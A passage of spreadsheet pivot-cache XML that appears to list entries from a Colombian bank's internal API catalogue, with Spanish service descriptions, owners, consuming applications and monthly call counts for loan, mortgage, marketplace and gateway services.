    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Auditoria _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ APP_NU0114001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ BNPL_NU0287001"/>
    <m/>
    <n v="17"/>
    <n v="1"/>
    <n v="33"/>
    <n v="2"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-06T22:39:54"/>
    <s v="Loans"/>
    <n v="223"/>
    <s v="Loans - Payment"/>
    <n v="112"/>
    <s v="loans-payment"/>
    <s v="Esta API encargada de realizar los pagos de créditos comerciales, enviando al TEF3 de la transacción 001, la cuenta, el tipo de cuenta y el valor del prestamo de cliente para aplicar su pago, retornando el numero de pagaré."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y Consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="PagoPrestamos/V2.0"/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Auditoria _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ APP_NU0114001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ BNPL_NU0287001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-25T17:41:11"/>
    <s v="Consumer Loan Sufi"/>
    <n v="111"/>
    <s v="Loans Information"/>
    <n v="101"/>
    <s v="loans-information"/>
    <s v="API para la consulta de obligaciones Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="Wompi_NU0093001 _x000d__x000a_ DesembolsosSufi_AW1097001 _x000d__x000a_ BotonRecaudoWompi_NU0093001"/>
    <n v="175315"/>
    <n v="264901"/>
    <n v="292700"/>
    <n v="308208"/>
    <n v="396773"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-19T15:10:59"/>
    <s v="Consumer Loan Sufi"/>
    <n v="201"/>
    <s v="Loans Information"/>
    <n v="200"/>
    <s v="loans-information"/>
    <s v="API para la consulta de obligaciones Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="AW1097001 _x000d__x000a_ NU0093001 _x000d__x000a_ DesembolsosSufi_AW1097001 _x000d__x000a_ Monitoreo_AW1097001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="175315"/>
    <n v="264901"/>
    <n v="292700"/>
    <n v="308208"/>
    <n v="396773"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-04-19T19:33:41"/>
    <s v="Loans Sufi"/>
    <n v="101"/>
    <s v="Loans Sufi - Simulation"/>
    <n v="101"/>
    <s v="simulation"/>
    <s v="El API 'Simulación del Crédito'? se encarga de recibir los datos básicos, valores y plazo de un posible crédito, para proceder a generar una simulación y responder con los resultados de cuotas y demás datos de pagos que el cliente asumirá, para que con dicha información pueda tomar la decisión de iniciar la radicación del estudio de crédito. Esta API será genérica para cualquier producto o lí­nea de negocio en SUFI."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MovilidadCore_AW1281002 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="40741"/>
    <n v="30502"/>
    <n v="34254"/>
    <n v="68134"/>
    <n v="112684"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-01-27T20:17:00"/>
    <s v="Loans"/>
    <n v="223"/>
    <s v="Loans-Collaterals"/>
    <n v="105"/>
    <s v="loans-collaterals"/>
    <s v="Esta API permite consultar la información general de las garantí­as  asociadas a un cliente"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y Consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="ConsultaDatosCartera/V2.0"/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ Auditoria _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ LimitsCreditExhibition_NU0114001 _x000d__x000a_ APP_NU0114001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ BNPL_NU0287001"/>
    <n v="919"/>
    <n v="286"/>
    <n v="793"/>
    <n v="9721"/>
    <n v="48911"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-07-21T14:49:28"/>
    <s v="Customer Data Sufi"/>
    <n v="110"/>
    <s v="Management"/>
    <n v="100"/>
    <s v="management"/>
    <s v="API para la gestión de obligaciones Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="adaptadorSufi_NU0204001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Mantenimiento Obligaciones Cartera"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="En su versión inicial, este servicio expone una capacidad que permite actualizar los detalles de un préstamo en el aplicativo core Bankvision."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="AW1313 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-05-20T11:09:59"/>
    <s v="Loans Study Vehicle"/>
    <n v="101"/>
    <s v="Manual Study"/>
    <n v="101"/>
    <s v="manual-study"/>
    <s v="API publica que permite realizar de la información adicional en que caso de requerirse un estudio manueal para el crédito de vehiculo. Esta API se toma como una tercera familia de apis, con tres capacidades que se irán ejecutando secuencialmente. Una vez realizado este registro de datos para el estudio manual, se entrega una respuesta indicando que se realizará el estudio. Esta APIs esta especificada en el contexto funcional de SUFI-Vehiculos."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="VentasDigitalesSufi_NU0037 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-06T02:22:21"/>
    <s v="Loans Study Vehicle"/>
    <n v="105"/>
    <s v="Manual Study"/>
    <n v="105"/>
    <s v="manual-study"/>
    <s v="&lt;p&gt;La capacidad expuesta por Grupo Bancolombia tiene como objetivo la radicaci&amp;oacute;n de la informaci&amp;oacute;n necesaria para realizar el estudio de cr&amp;eacute;dito para v&amp;eacute;hiculo con los siguientes pasos del proceso:&lt;/p&gt; &lt;p&gt;Los pasos a seguir en este proceso son:&lt;br /&gt;   &lt;ol&gt;&lt;li&gt;La soluci&amp;oacute;n se debe autenticar en la plataforma de APIs de Bancolombia.&lt;/li&gt;&lt;li&gt;La soluci&amp;oacute;n debe presentar los formularios para la captura de la informaci&amp;oacute;n para la radicaci&amp;oacute;n de la solicitud del cr&amp;eacute;dito, con los datos del comercio si aplica, categorizaci&amp;oacute;n del producto, datos del producto.&lt;/li&gt;&lt;li&gt;Continua con el registro de informaci&amp;oacute;n Personal (realizando la precarga de datos si es cliente Bancolombia por medio de la API de Customers) y financiera, actividad econ&amp;oacute;mica.&lt;/li&gt;&lt;li&gt;Se realiza el env&amp;iacute;o de informaci&amp;oacute;n aceptando terminos y condiciones.&lt;/li&gt;&lt;li&gt;Se realizan la validaciones de Pre-Bureau, Bureau y Pos-Bureau.&lt;/li&gt;&lt;li&gt;Generaci&amp;oacute;n autom&amp;aacute;tica de una aprobaci&amp;oacute;n, rechazo o en su defecto env&amp;iacute;o a estudio manual.&lt;/li&gt; &lt;/ol&gt;"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ VentasDigitalesSufiVehiculos_AW1097001 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="2561"/>
    <n v="2807"/>
    <n v="2490"/>
    <n v="2504"/>
    <n v="2944"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-03-11T16:55:50"/>
    <s v="Market Place"/>
    <n v="133"/>
    <s v="Market Place - Items"/>
    <n v="113"/>
    <s v="market-place-items"/>
    <s v="Esta API permite consultar la información de los productos que son ofrecidos atraves del market place de Bancolombia. Permitiendo consultar listas de productos, un producto en especí­fico, los productos mas visitas o los productos favoritos por clientes."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="HabitatCore_AW1281003 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="390710"/>
    <n v="399448"/>
    <n v="330422"/>
    <n v="413011"/>
    <n v="370392"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-03-11T16:55:50"/>
    <s v="Market Place"/>
    <n v="133"/>
    <s v="Market Place - Orders"/>
    <n v="110"/>
    <s v="market-place-orders"/>
    <s v="Esta API permite consultar la información de las órdenes generadas por los clientes a través del market place de Bancolombia."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v=""/>
    <m/>
    <s v="HabitatCore_AW1281003 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="164"/>
    <n v="215"/>
    <n v="120"/>
    <n v="172"/>
    <n v="195"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-03-11T16:55:50"/>
    <s v="Market Place"/>
    <n v="133"/>
    <s v="Market Place - Schedule"/>
    <n v="110"/>
    <s v="market-place-schedule"/>
    <s v="Esta API permite gestionar la agenda de un cliente en el market place, donde podrá consultar sus agendas, reagendar una cita o cancelar una cita."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v=""/>
    <m/>
    <s v="HabitatCore_AW1281003 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="652"/>
    <n v="861"/>
    <n v="480"/>
    <n v="676"/>
    <n v="765"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-08-12T15:51:00"/>
    <s v="Loans Sufi Catalogs"/>
    <n v="100"/>
    <s v="Master Reference"/>
    <n v="100"/>
    <s v="loans-catalogs-master-reference"/>
    <s v="Esta API tiene capacidades que permiten la consulta de los catálogos maestros de referencia dentro del contexto de las solicitudes de crédito de Sufi, que se exponen para diferentes funcionalidades que serán expuestas a los clientes y así­ para facilitar el registro de información y consumo de otras capacidades que requieren estos datos referencia."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <s v=""/>
    <m/>
    <s v="NU0037003_VDSAUTOGESTIONCONSUMOBACK _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ VDSAUTOGESTIONCONSUMOBACK_NU0037003"/>
    <n v="1833275"/>
    <n v="1434873"/>
    <n v="1173941"/>
    <n v="1477751"/>
    <n v="2297368"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-05-26T17:24:04"/>
    <s v="Merchandising Loan"/>
    <n v="100"/>
    <s v="Merchandising Loan - Financial Renting"/>
    <n v="100"/>
    <s v="merchandising-loan-financial-renting"/>
    <s v="Esta API permite identificar informacion sobre un cliente con base en el arrendamiento por el uso de un producto y/o servicio"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="RespuestaAlFrente_AW1086001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="2"/>
    <n v="1"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Modificacion De Cupo Tarjetas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Modificación de Cupo permite aumentar o disminuir el cupo (límite) de una tarjeta de crédito mediante el número de tarjeta, el cupo actual y el cupo nuevo."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <s v="Tarjetas Vision Plus_ISTVP001"/>
    <s v="APIC _x000d__x000a_AW1176 _x000d__x000a_AW1285001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Modificar Participante"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Permite modificar información de participantes en el HUB y la sincronización que se debe realizar en otros sistemas (Finacle, IAM, MUREX)"/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="Hub de Información_Entrega de informacion_AW0846001"/>
    <s v="AW0611002 _x000d__x000a_AW0611001 _x000d__x000a_AW0795"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Modificar Participante"/>
    <n v="500"/>
    <s v="No Aplica"/>
    <s v="Permite modificar información de participantes en el HUB y la sincronización que se debe realizar en otros sistemas (Finacle, IAM, MUREX)"/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="SAP CRM"/>
    <s v="AW0683001 _x000d__x000a_AW0563001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Monitoreo Riesgo Transaccional"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio evalúa el riesgo de una transacción en modo síncrono, aplicando sobre la misma los filtros definidos en el ámbito de monitoreo transaccional, es decir, reglas que validen condiciones de las transacciones, adicional, el score de riesgo que SAS FM (herramienta que responde el score a Thanos)  genera de acuerdo al perfil transaccional del cliente. _x000a__x000a_Todo el proceso de enviar la petición desde el consumidor, que pase por integración, complementar la información necesaria, entregar a la herramienta de monitoreo SAS Fraud Management, y responder al consumidor con una recomendación sobre la decisión de la transacción se debe realizar en menos de 500 milisegundos. Es el consumidor el que debe aplicar la acción bajo la recomendación del motor (ejemplo: declinar una transacción)."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <m/>
    <s v="SVP _x000d__x000a_APP _x000d__x000a_SVE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-03T22:13:55"/>
    <s v="Mortgage"/>
    <n v="212"/>
    <s v="Mortgage Loan - Balances"/>
    <n v="302"/>
    <s v="mortgage-loan-balances"/>
    <s v="La API permitirá a los consumidores consultar el saldo de los proyectos que están asociados a un constructor en particular, el servicio retornara campos como nombre del proyecto, titular, saldos intereses trimestrales etc."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <s v="Inmobiliario"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <s v="ConsultarCreditoHipotecario/V2.0_x000a_ConsultarCreditoHipotecario/V3.0"/>
    <m/>
    <s v="PortalConstructorAW0360004_SVE _x000d__x000a_ PortalConstructorAW0360004_SVE _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ MONITOREO_AW1010001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="9816"/>
    <n v="7608"/>
    <n v="7674"/>
    <n v="7380"/>
    <n v="8297"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-02-11T23:10:16"/>
    <s v="Mortgage Loan Behavioral"/>
    <n v="110"/>
    <s v="Mortgage Loan Behavioral - Mortgage Loan Study"/>
    <n v="110"/>
    <s v="mortgage-loan-behavioral-mortgage-loan-study"/>
    <s v="El API Mortgage Loan Behavioral - Mortgage Loan Study: permite disponer el resultado del estudio de crédito de Hipotecario de formas más ágil, entregando de manera inmediata la respuesta de un cupo para clientes actuales y nuevos, de acuerdo con las polí­ticas de riesgos."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="RespuestaFrenteHipo_AW0856 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="1688"/>
    <n v="3427"/>
    <n v="7298"/>
    <n v="12173"/>
    <n v="16341"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-04-11T09:31:31"/>
    <s v="Mortgage Loan Payments"/>
    <n v="100"/>
    <s v="Mortgage Loan Payments- Constructor"/>
    <n v="100"/>
    <s v="mortgage-loan-payments-constructor"/>
    <s v="Esta API expone el metodo de PagoCreditoHipotecarioConstructor que permite tanto el pago como el reverso de créditos hipotecarios de corto plazo"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <s v="Inmobiliario"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_ALM"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_APM_TLS_ADAPTER"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="OMAPM_SUFI_AW1097001"/>
    <s v="Carventuri _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_CA_AllFunds_AF"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_CA_CADENA_CA"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_CA_restjson"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_CIB_RemesasMoneyGram_RMG"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_EnvioCorreoElectronicoTODO1_ECT"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_GAF_Marcaciones"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_CONSULTARCLIENTEPREFERENCIALFNAL_CCPFN"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_GestionAutenticacionOAuth_v2_GAO"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="CLR (CLARO)_x000a_TLP (Teleperformance)_x000a_KNT (KONECTA)_x000a_BOT (TABOOT BANCOLOMBIA)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_GESTIONGARANTIASFONDONACIONAL_GGFN"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="BankVision - BKE_Garantias_ISBKS0003"/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_GIROS_JSON_MULTICANAL"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <s v="Monica Cecilia Gallego Rengifo"/>
    <m/>
    <s v="GIR-Giros Nacionales Multicanal_ISGIR001"/>
    <s v="AW1227001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_GOOGLE_RECAPTCHA_VERIFY"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_HTTPS_ADMINFO"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_HTTPS_ADMINFO_JSON"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_HTTPS_DOMINA"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_HTTPS_METRO"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_HTTPS_PIS"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_HTTPS_PS"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_HTTPS_THOMASEXPRESS"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_HTTPS_TODO1"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_INALAMBRIA"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="MPG_IA_InformeDiarioDIAN"/>
    <m/>
    <m/>
